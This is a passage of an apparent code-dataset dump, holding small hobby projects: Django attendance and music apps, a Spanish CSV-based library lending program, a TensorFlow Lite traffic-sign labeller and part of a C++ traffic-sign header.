*\n\nadmin.site.register(Employee)\nadmin.site.register(Entry)\nadmin.site.register(Exit)\nadmin.site.register(Leave)\n" }, { "alpha_fraction": 0.6191035509109497, "alphanum_fraction": 0.6214523315429688, "avg_line_length": 26.154254913330078, "blob_id": "26fceb2dcdfb976fa63141fe51d2d04c2b38339b", "content_id": "fe7fcc60764396cf04bb4766112de75422d19c51", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5109, "license_type": "no_license", "max_line_length": 96, "num_lines": 188, "path": "/main/views.py", "repo_name": "heerapp/first", "src_encoding": "UTF-8", "text": "from django.shortcuts import render, redirect, get_object_or_404,HttpResponseRedirect,reverse\nfrom django.contrib import auth\nfrom django.contrib.auth.decorators import permission_required,login_required\nfrom .forms import *\n\n\n\ndef index(request):\n employee = Employee.objects.all()\n return render(request, 'main/index.html', {'employee': employee})\n\n\n@permission_required('is_superuser', raise_exception=True)\ndef home(request):\n leave = Leave.objects.all().filter(status= 'pending...')\n entry = Entry.objects.all().filter(start_time__date__day=datetime.now().day)\n exit = Exit.objects.all().filter(end_time__date__day=datetime.now().day)\n count = Employee.objects.all().count()\n present = entry.count()\n absent = count - present\n\n context = {\n 'leave': leave,\n 'entry': entry,\n 'exit': exit,\n 'count': count,\n 'present': present,\n 'absent': absent,\n }\n return render(request, 'main/home.html', context)\n\n\n@permission_required('is_superuser', login_url='login')\ndef create(request):\n form = UserRegisterForm(request.POST or None)\n\n if form.is_valid():\n form.save()\n return redirect('/')\n\n return render(request, 'main/create.html', {'form':form})\n\n\n@permission_required('is_superuser', raise_exception=True)\ndef employee(request):\n employee = Employee.objects.all().order_by('-id')\n return render(request, 'main/employees.html', {'employee': employee})\n\n\n@login_required(login_url='login')\ndef employ(request, name):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = EmployeeUpdateForm(request.POST, request.FILES, instance=request.user.employee)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n return redirect('/')\n else:\n u_form = UserUpdateForm(instance=request.user)\n p_form = EmployeeUpdateForm(instance=request.user.employee)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form,\n }\n return render(request, 'main/employ.html', context)\n\n\ndef leave(request):\n form = LeaveForm(request.POST or None)\n\n if form.is_valid():\n leave = form.save(commit=False)\n leave.user = request.user\n if leave.date < datetime.now().date():\n leave.status = \"Granted\"\n leave.save()\n return redirect('/')\n\n return render(request, 'main/leave.html')\n\n\ndef entry(request):\n form = EntryForm(request.POST or None)\n\n if form.is_valid():\n entry = form.save(commit=False)\n entry.user = request.user\n entry.save()\n return redirect('/')\n return render(request, 'main/entry.html')\n\n\ndef exit(request):\n form = ExitForm(request.POST or None)\n if form.is_valid():\n exit = form.save(commit=False)\n exit.user = request.user\n now = datetime.now()\n time = now.strftime(\"%H\")\n if time < '4':\n exit.status = \"Half Day\"\n else:\n exit.status = \"Full Day\"\n exit.save()\n return redirect('/')\n else:\n return render(request, 'main/exit.html')\n\n\ndef attendance(request, user):\n entry = Entry.objects.filter(user=request.user)\n exit = Exit.objects.filter(user=request.user)\n now = datetime.now()\n month = now.strftime(\"%B\")\n context = {\n 'exit': exit,\n 'entry':entry,\n 'month': month,\n }\n return render(request, \"main/details.html\", context)\n\n\ndef grant(request, pk):\n leave = get_object_or_404(Leave, pk=pk)\n\n if request.method == 'POST':\n leave.status = \"Granted\"\n leave.save()\n return redirect('/home')\n\n return render(request, 'main/grant.html', {'leave': leave})\n\n\ndef reject(request, pk):\n leave = get_object_or_404(Leave, pk=pk)\n\n if request.method == 'POST':\n leave.status = \"rejected\"\n leave.save()\n return redirect('/home')\n\n return render(request, 'main/reject.html', {'leave': leave})\n\n\n@login_required\ndef profile(request):\n return HttpResponseRedirect(reverse('detail', args=[request.user.username]))\n\n\ndef all_attendence(request):\n entry = Entry.objects.all()\n exit = Exit.objects.all()\n context = {\n 'entry': entry,\n 'exit': exit,\n }\n return render(request, 'main/attendance.html', context)\n\n\ndef all_leave(request):\n leave = Leave.objects.all()\n return render(request, 'main/leaves.html', {'leave': leave})\n\n\ndef leaves(request, user):\n leave = Leave.objects.filter(user=request.user)\n context = {\n 'leave':leave,\n }\n return render(request, \"main/leaves.html\", context)\n\n\ndef profiles(request,name):\n user = request.user\n employee = Employee.objects.all().filter(user=user)\n total = 12\n count = Leave.objects.all().filter(user=request.user).filter(status='Granted').count()\n available = total - count\n content = {\n 'employee': employee,\n 'total': total,\n 'count': count,\n 'available': available,\n }\n\n return render(request, 'main/employs.html', content)\n\n\n\n\n" } ]
6
solanoluis/GestiondeLibros
https://github.com/solanoluis/GestiondeLibros
a88019a555aeb6344fe3f64fa76a1651409784ef
d42fbfcfd7207c8d2a3a474c7bd092c9b63ac78b
0eb8101d195fc95083094645fef890f28afaf824
refs/heads/master
2022-11-16T22:37:45.560844
2020-07-07T18:10:50
2020-07-07T18:10:50
277,401,527
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.42728298902511597, "alphanum_fraction": 0.4322435259819031, "avg_line_length": 32.7529411315918, "blob_id": "b69eddc404313272422fc7d879d28b305c7cf468", "content_id": "e2f53367956e3c2b47b15558b4738376cf556dcc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8875, "license_type": "no_license", "max_line_length": 117, "num_lines": 255, "path": "/Proyecto Luis Solano.py", "repo_name": "solanoluis/GestiondeLibros", "src_encoding": "UTF-8", "text": "import os\r\nimport csv\r\nimport operator\r\nimport sys\r\nimport time\r\n\r\nsalida = False\r\n\r\n#********************************************************************************************************************\r\n#FUNCION QUE DIBUJA EL MENU Y LLAMA A LA FUNCION QUE VALIDA QUE LA OPCION DEL MENU SEA CORRECTA\r\ndef dibujaMenu():\r\n os.system('cls')\r\n print(\"***************************************\")\r\n print(\"Gestión y Control de Préstamo de Libros\")\r\n print(\"***************************************\")\r\n print(\"\")\r\n print(\"a - Ver lista de personas\")\r\n print(\"b - Ordenar lista de personas\")\r\n print(\"c - Imprimir registro de lista de persona\")\r\n print(\"d - Ver lista de libros\")\r\n print(\"e - Buscar libro\")\r\n print(\"f - Prestar libro\")\r\n print(\"g - Devolver libro\")\r\n print(\"h - Ver libros prestados\")\r\n print(\"i - Salir\")\r\n print(\"\")\r\n\r\n#********************************************************************************************************************\r\n#MUESTRA LISTA DE PERSONAS\r\n#OPCION A DEL MENU\r\ndef muestraPersonas():\r\n with open (\"personas.csv\", \"r\") as csv_personas:\r\n csv_reader = csv.DictReader(csv_personas)\r\n\r\n for line in csv_reader:\r\n print(\"Indice: \",line[\"Indice\"])\r\n print(\"Cedula: \",line[\"Identificación\"])\r\n print(\"Nombre: \", line[\"Nombre\"], \" \", end=\"\")\r\n print(line[\"Primer Apellido\"], \" \", end=\"\")\r\n print(line[\"Segundo Apellido\"],)\r\n print(\"E-mail: \", line[\"Correo Electrónico\"])\r\n print(\"\")\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#ORDENA LA LISTA DE PERSONAS POR PRIMER APELLIDO\r\n#OPCION B DEL MENU\r\ndef ordenLista():\r\n print(\"1. Ordenar la lista por Cedula\")\r\n print(\"2. Ordenar la lista por Nombre\")\r\n print(\"3. Ordenar la lista por Primer Apellido\")\r\n print(\"4. Ordenar la lista por segundo Apellido\")\r\n print(\"5. Ordenar la lista por correo electronico\")\r\n\r\n op = int(input())\r\n print(\"\")\r\n\r\n sample = open(\"personas.csv\", \"r\")\r\n csv1 = csv.reader(sample)\r\n next(csv1, None)\r\n sort = sorted(csv1,key=operator.itemgetter(op)) \r\n for eachline in sort:\r\n print(eachline[1], \" \", eachline[2], \" \", eachline[3], \" \",eachline[4], \" \", eachline[5])\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#IMPRIME REGISTRO DE LISTA DE PERSONAS\r\n#OPCION C DEL MENU\r\ndef imprimePersona():\r\n csv_file = csv.reader(open('personas.csv', \"r\"))\r\n\r\n row_count = sum(1 for row in csv_file)\r\n print(\"Exiten \", row_count-1, \"registros guardados.\")\r\n\r\n op = input(\"Digite el numero de registro que desea ver: \")\r\n\r\n csv_file = csv.reader(open('personas.csv', \"r\"))\r\n\r\n for row in csv_file:\r\n if op == row[0]:\r\n print(\"\")\r\n print(\"**********************************\")\r\n print (\"Cedula: \", row[1])\r\n print (\"Nombre: \", row[2])\r\n print (\"Primer Apellido: \", row[3])\r\n print (\"Segundo Apellido: \", row[4])\r\n print(\"**********************************\")\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#IMPRIME REGISTRO DE LISTA DE LIBROS\r\n#OPCION D DEL MENU\r\ndef imprimeLibros():\r\n with open (\"libros.csv\", \"r\") as csv_personas:\r\n csv_reader = csv.DictReader(csv_personas)\r\n\r\n for line in csv_reader:\r\n #print(line[\"idLibro\"], \" - \", \"Genero: \", line[\"Genero\"])\r\n print(line[\"idLibro\"], \"|\",\"Titulo: \", line[\"nombre\"], \"| \", end=\"\")\r\n print(\"Autor: \", line[\"Autor\"],)\r\n print(\"\")\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#FUNCION QUE BUSCA UN LIBRO\r\n#OPCION E DEL MENU\r\ndef buscaLibro():\r\n with open (\"libros.csv\", \"r\") as csv_personas:\r\n csv_reader = csv.DictReader(csv_personas)\r\n\r\n for line in csv_reader:\r\n print(\"Identificador del libro: \",line[\"idLibro\"])\r\n print(\"Titulo: \", line[\"nombre\"], \" \")\r\n print(\"\")\r\n\r\n number = input(\"Digite el indice del libro a mostrar: \")\r\n\r\n csv_file = csv.reader(open('libros.csv', \"r\"))\r\n\r\n for row in csv_file:\r\n if number == row[0]:\r\n print(\"\")\r\n print(\"**********************************\")\r\n print (\"Titulo: \", row[1])\r\n print (\"Genero: \", row[2])\r\n print (\"Autor: \", row[3])\r\n print (\"Estatus del libro: \", row[4])\r\n print(\"**********************************\")\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#FUNCION PARA MOSTRAR LIBROS DISPONIBLE Y PRESTAR UNO\r\n#OPCION F DEL MENU\r\ndef prestaLibro():\r\n csv_file = csv.reader(open('libros.csv', \"r\"))\r\n\r\n print(\"Libros disponibles\")\r\n\r\n for row in csv_file:\r\n\r\n if row[4] == \"Disponible\":\r\n print (\"Identificador: \", row[0])\r\n print (\"Titulo: \", row[1])\r\n print (\"Genero: \", row[2])\r\n print (\"Autor: \", row[3])\r\n print (\"Estatus del libro: \", row[4])\r\n print(\"**********************************\")\r\n \r\n opLibro = int(input(\"Digite el identificador del libro que desea: \"))\r\n\r\n r = csv.reader(open('libros.csv', \"r\"))\r\n lines = list(r)\r\n\r\n lines[opLibro][4] = \"No Disponible\"\r\n\r\n writer = csv.writer(open('libros.csv', 'w', newline='\\n'))\r\n writer.writerows(lines)\r\n \r\n print(\"Se le ha prestado este libro!\")\r\n print(\"\")\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#FUNCION PARA DEVOLVER LIBROS\r\n#OPCION G DEL MENU\r\ndef devuelveLibro():\r\n csv_file = csv.reader(open('libros.csv', \"r\"))\r\n\r\n print(\"Libros disponibles\")\r\n\r\n for row in csv_file:\r\n\r\n if row[4] == \"No Disponible\":\r\n print (\"Identificador: \", row[0])\r\n print (\"Titulo: \", row[1])\r\n print (\"Genero: \", row[2])\r\n print (\"Autor: \", row[3])\r\n print(\"**********************************\")\r\n \r\n opLibro = int(input(\"Digite el identificador del libro que desea: \"))\r\n\r\n r = csv.reader(open('libros.csv', \"r\"))\r\n lines = list(r)\r\n\r\n lines[opLibro][4] = \"Disponible\"\r\n\r\n writer = csv.writer(open('libros.csv', 'w', newline='\\n'))\r\n writer.writerows(lines)\r\n\r\n print(\"Su libro ha sido devuelto!\")\r\n print(\"\")\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#MUESTRA LIBROS PRESTADOS\r\n#OPCION H DEL MENU\r\ndef librosPrest():\r\n print(\"\")\r\n print(\"Libros prestados\")\r\n print(\"\")\r\n\r\n csv_file = csv.reader(open('libros.csv', \"r\")) \r\n for row in csv_file:\r\n\r\n if row[4] == \"No Disponible\":\r\n print (\"Titulo: \", row[1])\r\n print (\"Genero: \", row[2])\r\n print (\"Autor: \", row[3])\r\n print(\"**********************************\")\r\n\r\n input(\"Presione un ENTER para continuar...\")\r\n\r\n#********************************************************************************************************************\r\n#VALIDA OPCION DE MENU\r\nlist_resp = [\"a\",\"b\",\"c\",\"d\",\"e\",\"f\",\"g\",\"h\",\"i\"]\r\n\r\n#********************************************************************************************************************\r\n#ELIGE FUNCION SEGUN VARIABLE OP, SI SE ELIGIO UNA OPCION INCORRECTA VUELVE A MOSTRAR EL MENU\r\ndef opMenu(op):\r\n if op in list_resp:\r\n if op == \"a\":\r\n muestraPersonas()\r\n if op == \"b\":\r\n ordenLista()\r\n if op == \"c\":\r\n imprimePersona()\r\n if op == \"d\":\r\n imprimeLibros()\r\n if op == \"e\":\r\n buscaLibro()\r\n if op == \"f\":\r\n prestaLibro()\r\n if op == \"g\":\r\n devuelveLibro()\r\n if op == \"h\":\r\n librosPrest()\r\n else:\r\n print(\"Opción invalida!\")\r\n time.sleep(1)\r\n\r\n#********************************************************************************************************************\r\n#INICIO\r\nwhile (salida == False):\r\n dibujaMenu()\r\n op = input(\"Por favor seleccione una opcion: \")\r\n if op == \"i\":\r\n print(\"Lo esperamos pronto!\")\r\n time.sleep(1)\r\n salida = True\r\n else:\r\n opMenu(op)\r\n\r\n\r\n\r\n\r\n" } ]
1
yamannassar/salalemTask-api
https://github.com/yamannassar/salalemTask-api
34beac1370569ea247dfd6c54ed9cf4e9c582fab
e1f385641446eaefa1126dc0578c73bc2c29923b
94c8d4bb1efac7298bbee222ad835ea357294884
refs/heads/main
2023-02-26T16:26:55.010214
2021-02-01T09:05:23
2021-02-01T09:05:23
331,559,547
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6905916333198547, "alphanum_fraction": 0.6905916333198547, "avg_line_length": 20.47916603088379, "blob_id": "ca4660fef11e497dcc0864d45c93de74d35eb006", "content_id": "e17328c7a4f316cd0d5b9cac7b9c9e49d7a001cc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1031, "license_type": "no_license", "max_line_length": 49, "num_lines": 48, "path": "/music/schema.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "import graphene\nfrom graphene_django import DjangoObjectType\n\nfrom .models import Album, Artist, Song\n\n\nclass ArtistType(DjangoObjectType):\n class Meta:\n model = Artist\n fields = '__all__'\n\n\nclass AlbumType(DjangoObjectType):\n class Meta:\n model = Album\n fields = '__all__'\n\n\nclass SongType(DjangoObjectType):\n class Meta:\n model = Song\n fields = '__all__'\n\n\nclass ArtistQuery(graphene.ObjectType):\n all_artists = graphene.List(ArtistType)\n\n def resolve_all_artists(root, info):\n return Artist.objects.all()\n\n\nclass AlbumQuery(graphene.ObjectType):\n all_albums = graphene.List(AlbumType)\n\n def resolve_all_albums(root, info):\n return Album.objects.all()\n\n\nclass SongQuery(graphene.ObjectType):\n all_songs = graphene.List(SongType)\n\n def resolve_all_songs(root, info):\n return Song.objects.all()\n\n\nartistSchema = graphene.Schema(query=ArtistQuery)\nalbumSchema = graphene.Schema(query=AlbumQuery)\nsongSchema = graphene.Schema(query=SongQuery)\n" }, { "alpha_fraction": 0.694857120513916, "alphanum_fraction": 0.694857120513916, "avg_line_length": 52.030303955078125, "blob_id": "cccd6191fa063ad36094ed2d251858b0206b1946", "content_id": "22d2bc3846f1f28c811f4a76c0faf62ef6a59a02", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1750, "license_type": "no_license", "max_line_length": 93, "num_lines": 33, "path": "/music/urls.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "# from django.urls import path\n# from . import views\n# from django.urls import path\n\n# urlpatterns = [\n# path('', views.musicOverview, name='music-overview'),\n# path('artists-list/', views.artistsList, name='artists-list'),\n# path('artists-list/<str:pk>', views.getArtist, name='artist-info'),\n# path('add-artist/', views.addArtist, name='artist-create'),\n# path('update-artist/<str:pk>', views.updateArtist, name='artist-update'),\n# path('delete-artist/<str:pk>', views.deleteArtist, name='artist-delete'),\n# path('albums-list/', views.albumsList, name='albums-list'),\n# path('albums-list/<str:artistPk>', views.albumsByArtist, name='albums-by-artist'),\n# path('add-album/', views.addAlbum, name='album-create'),\n# path('update-album/<str:pk>', views.updateAlbum, name='album-update'),\n# path('delete-album/<str:pk>', views.deleteAlbum, name='album-delete'),\n# path('songs-list/', views.songsList, name='albums-list'),\n# path('songs-list/<str:albumPk>', views.songsByAlbum, name='songs-by-album'),\n# path('add-song/', views.addSong, name='song-create'),\n# path('update-song/<str:pk>', views.updateSong, name='song-update'),\n# path('delete-song/<str:pk>', views.deleteSong, name='song-delete'),\n# ]\n\nfrom django.urls import path\nfrom graphene_django.views import GraphQLView\nfrom django.views.decorators.csrf import csrf_exempt\nfrom music.schema import albumSchema, artistSchema, songSchema\n\nurlpatterns = [\n path(\"allArtists\", csrf_exempt(GraphQLView.as_view(graphiql=True, schema=artistSchema))),\n path(\"allAlbums\", csrf_exempt(GraphQLView.as_view(graphiql=True, schema=albumSchema))),\n path(\"allSongs\", csrf_exempt(GraphQLView.as_view(graphiql=True, schema=songSchema))),\n]\n" }, { "alpha_fraction": 0.674369752407074, "alphanum_fraction": 0.674369752407074, "avg_line_length": 20.636363983154297, "blob_id": "0eba69938cb4a76b962438f1806abe029b6ed23d", "content_id": "f182174ae8c15abbc52a653969483cd5372c70ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 476, "license_type": "no_license", "max_line_length": 52, "num_lines": 22, "path": "/music/serializers.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Artist\nfrom .models import Album\nfrom .models import Song\n\n\nclass ArtistSerializer(serializers.ModelSerializer):\n class Meta:\n model = Artist\n fields = '__all__'\n\n\nclass AlbumsSerializer(serializers.ModelSerializer):\n class Meta:\n model = Album\n fields = '__all__'\n\n\nclass SongsSerializer(serializers.ModelSerializer):\n class Meta:\n model = Song\n fields = '__all__'\n" }, { "alpha_fraction": 0.6994439363479614, "alphanum_fraction": 0.6994439363479614, "avg_line_length": 25.28461456298828, "blob_id": "5682e9da3c1f08d3527a0c7d6b473335fe80fa18", "content_id": "ffe2181efda5c68d959a138b843fd94dd2406ea8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3417, "license_type": "no_license", "max_line_length": 81, "num_lines": 130, "path": "/music/views.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "from rest_framework import serializers\nfrom .models import Album, Artist, Song\nfrom django.shortcuts import render\nfrom rest_framework.decorators import api_view\nfrom rest_framework.response import Response\nfrom .serializers import ArtistSerializer, AlbumsSerializer, SongsSerializer\n\n# Create your views here.\n\n\n@api_view(['GET'])\ndef musicOverview(request):\n music_urls = {\n 'List': '/artists-list/'\n }\n return Response(music_urls)\n\n\n@api_view(['GET'])\ndef artistsList(request):\n artists = Artist.objects.all()\n serializer = ArtistSerializer(artists, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef getArtist(request, pk):\n artists = Artist.objects.get(id=pk)\n serializer = ArtistSerializer(artists)\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef addArtist(request):\n serializer = ArtistSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef updateArtist(request, pk):\n artist = Artist.objects.get(id=pk)\n serializer = ArtistSerializer(instance=artist, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\ndef deleteArtist(request, pk):\n artist = Artist.objects.get(id=pk)\n artist.delete()\n return Response(\"The artist \" + artist.artist_name + \" deleted successfully\")\n\n\n@api_view(['GET'])\ndef albumsList(request):\n albums = Album.objects.all()\n serializer = AlbumsSerializer(albums, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef albumsByArtist(request, artistPk):\n album = Album.objects.filter(artist=artistPk)\n serializer = AlbumsSerializer(album, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef addAlbum(request):\n serializer = AlbumsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef updateAlbum(request, pk):\n album = Album.objects.get(id=pk)\n serializer = AlbumsSerializer(instance=album, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\ndef deleteAlbum(request, pk):\n album = Album.objects.get(id=pk)\n album.delete()\n return Response(\"The album \" + album.album_title + \" deleted successfully\")\n\n\n@api_view(['GET'])\ndef songsList(request):\n songs = Song.objects.all()\n serializer = SongsSerializer(songs, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['GET'])\ndef songsByAlbum(request, albumPk):\n song = Song.objects.filter(album=albumPk)\n serializer = SongsSerializer(song, many=\"True\")\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef addSong(request):\n serializer = SongsSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['POST'])\ndef updateSong(request, pk):\n song = Song.objects.get(id=pk)\n serializer = SongsSerializer(instance=song, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n\n\n@api_view(['DELETE'])\ndef deleteSong(request, pk):\n song = Song.objects.get(id=pk)\n song.delete()\n return Response(\"The song \" + song.song_title + \" deleted successfully\")\n" }, { "alpha_fraction": 0.5245901346206665, "alphanum_fraction": 0.5737704634666443, "avg_line_length": 19.33333396911621, "blob_id": "a75b2d6e7228caa425d98cc274d95fe3ca4e4fd8", "content_id": "8cb827db7274d16a6e93606bf71944b00b7b2196", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 366, "license_type": "no_license", "max_line_length": 46, "num_lines": 18, "path": "/music/migrations/0002_auto_20210131_1359.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "# Generated by Django 3.0 on 2021-01-31 13:59\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('music', '0001_initial'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='artist',\n name='photo',\n field=models.URLField(blank=True),\n ),\n ]\n" }, { "alpha_fraction": 0.643059492111206, "alphanum_fraction": 0.655807375907898, "avg_line_length": 21.774192810058594, "blob_id": "f7676959ed7ba50ce65bf0db843e7dbde96b1eb9", "content_id": "bb72b34015079471051cbdf7bb35c498b976f0fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 706, "license_type": "no_license", "max_line_length": 64, "num_lines": 31, "path": "/music/models.py", "repo_name": "yamannassar/salalemTask-api", "src_encoding": "UTF-8", "text": "from django.db import models\n\n\nclass Artist(models.Model):\n artist_name = models.CharField(max_length=250)\n photo = models.URLField(blank=True)\n\n def __str__(self):\n return self.artist_name\n\n\nclass Album(models.Model):\n artist = models.ForeignKey(Artist, on_delete=models.CASCADE)\n album_title = models.CharField(max_length=250)\n\n def __str__(self):\n return self.album_title\n\n class Meta:\n ordering = ['album_title']\n\n\nclass Song(models.Model):\n album = models.ForeignKey(Album, on_delete=models.CASCADE)\n song_title = models.CharField(max_length=250)\n\n def __str__(self):\n return self.song_title\n\n class Meta:\n ordering = ['song_title']\n" } ]
6
asqw887/BILYEO_SHOP
https://github.com/asqw887/BILYEO_SHOP
0dc8fd1da9dbceb36a8e3ede99555bf7bfe378e1
79ececf70917bedc12e68584187f1ab7e19e35ad
a5bc59fa01f022f7f258aab0e0f6b95bbc2b1814
refs/heads/main
2022-12-30T14:53:47.203976
2020-10-23T18:44:33
2020-10-23T18:44:33
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7797784209251404, "alphanum_fraction": 0.7880886197090149, "avg_line_length": 31.863636016845703, "blob_id": "6702bda276a8a068b0664ffe635994be25c7a6f2", "content_id": "31baefd979f069f5db13a158188fa94bade2e7c5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 722, "license_type": "no_license", "max_line_length": 64, "num_lines": 22, "path": "/store/models/order.py", "repo_name": "asqw887/BILYEO_SHOP", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom .customer import Customer\nfrom .product import Product\nimport datetime\nfrom django import forms\n\nclass Order(models.Model):\n\tproduct = models.ForeignKey(Product,on_delete=models.CASCADE)\n\tcustomer = models.ForeignKey(Customer,on_delete=models.CASCADE)\n\tquantity = models.IntegerField(default=1)\n\tprice = models.IntegerField()\n\tdate = models.DateField(default=datetime.datetime.today)\n\taddress = models.CharField(max_length=255,blank=True)\n\tphone = models.CharField(max_length=15,blank=True)\n\tcompleted = models.BooleanField(default=False)\n\tstart_date = forms.DateTimeField(required=True)\n\tend_date = forms.DateTimeField(required=True)\n\t\n\n\t\n\tdef __str__(self):\n\t\treturn self.customer.email" } ]
1
jordanking94/TrafficSigns
https://github.com/jordanking94/TrafficSigns
4da3326fc97767ec00690fbef67f72e56b755aac
1895e1b2d34420f33d497b0cd41f154d797bb9ef
e7036dbdb30ccd7faa39f47a9559f953cc64863e
refs/heads/master
2022-11-06T02:26:47.059243
2020-06-26T00:30:12
2020-06-26T00:30:12
274,315,775
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.6138504147529602, "alphanum_fraction": 0.6520775556564331, "avg_line_length": 30.63157844543457, "blob_id": "9564436f7044314d12fa47d73ca285856b057843", "content_id": "82bdcdc68398887a12d31ecd1f0ca1cfed68aaa4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1805, "license_type": "no_license", "max_line_length": 84, "num_lines": 57, "path": "/clusterbased-build/scripts/label.py", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "\n\nimport numpy as np\nimport tensorflow as tf\nimport cv2 as cv\n\ntf.compat.v1.enable_eager_execution\nmodel_path = \"tf_files/graph.lite\"\n\ninterpreter = tf.compat.v2.lite.Interpreter(model_path=model_path)\ninterpreter.allocate_tensors()\n\ninput_details = interpreter.get_input_details()\noutput_details = interpreter.get_output_details()\n\ninput = interpreter.tensor(input_details[0][\"index\"])\noutput = interpreter.tensor(output_details[0][\"index\"])\n\nmean = 128\nstd_dev = 127\n\nheight = input_details[0]['shape'][1]\nwidth = input_details[0]['shape'][2]\n\nfloating_model = False\nif input_details[0]['dtype'] == type(np.float32(1.0)):\n floating_model = True\n\n\ndef label(img_data, x, y, xs, ys):\n image = np.asarray(img_data,dtype=\"uint8\")\n image = np.reshape(image, (240, 320, 3))\n #print('x: ' + str(x) + ', y: ' + str(y) + 'xs: ' + str(xs) +', ys: ' + str(ys))\n sub_image = image[y:y+ys, x:x+xs,:]\n sub_image = cv.cvtColor(sub_image, cv.COLOR_BGR2RGB)\n sub_image = cv.resize(sub_image, (128,128))\n sub_image = np.reshape(sub_image, (1,128, 128, 3))\n #print(sub_image.shape)\n #image = shaped_full_image[1,x:xs,y:ys,:]\n #cv.imshow('display', sub_image )\n #cv.waitKey(0)\n \n \n sub_image = np.reshape(sub_image, (1,128, 128, 3))\n #image = full_image[0:128, 0:128]\n \n #image = np.reshape(image, (1,img_height, img_width, 3))\n\n if floating_model:\n sub_image = np.float32(sub_image)\n sub_image = (sub_image - mean) / std_dev\n interpreter.set_tensor(input_details[0]['index'], sub_image)\n\n interpreter.invoke()\n predictions = np.squeeze(output()[0])\n predicted_confidence = max(predictions)\n object_class = np.where(predictions==predicted_confidence)\n object_class = object_class[0][0]\n return (object_class, predicted_confidence)\n" }, { "alpha_fraction": 0.43321096897125244, "alphanum_fraction": 0.43462297320365906, "avg_line_length": 24.846715927124023, "blob_id": "62d93acfe328ab39c89d6b6f34f320014e743293", "content_id": "499ad86b0a79aa10503053fb70565bf6dca1e7d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3541, "license_type": "no_license", "max_line_length": 105, "num_lines": 137, "path": "/clusterbased/backup/TSDR.hpp", "repo_name": "jordanking94/TrafficSigns", "src_encoding": "UTF-8", "text": "#define DEFAULT_LIFETIME 2\n\nnamespace TSDR\n{\n \n \n \n class Cluster {\n public:\n int id;\n int x, y, w, h;\n int n; // number of keypoints in cluster\n \n int kp_xmin, kp_ymin;\n int kp_xmax, kp_ymax;\n \n std::list<cv::KeyPoint> associated;\n \n Cluster () {}\n\n void add_keypoint(cv::KeyPoint kp) {\n this->associated.push_back(kp);\n this->n++;\n int x = int(kp.pt.x);\n int y = int(kp.pt.y);\n if(x<this->kp_xmin) this->kp_xmin=x;\n else if(x>this->kp_xmax) this->kp_xmax=x;\n if(y<this->kp_ymin) this->kp_ymin=y;\n else if(y>this->kp_ymax) this->kp_ymax=y;\n }\n \n Cluster(int id, int x, int y, int w, int h) {\n this->id = id;\n this->x = x;\n this->y = y;\n this->w = w;\n this->h = h;\n \n kp_xmin=INT_MAX;\n kp_xmax=0;\n kp_ymin=INT_MAX;\n kp_ymax=0;\n }\n \n };\n \n class ROI {\n public:\n int x, y; // x, y coords of top left corner\n int xs, ys; // width, height respectively\n int priority;\n int ref;\n \n ROI (int x, int y, int xs, int ys) {\n this->x = x;\n this->y = y;\n this->xs = xs;\n this->ys = 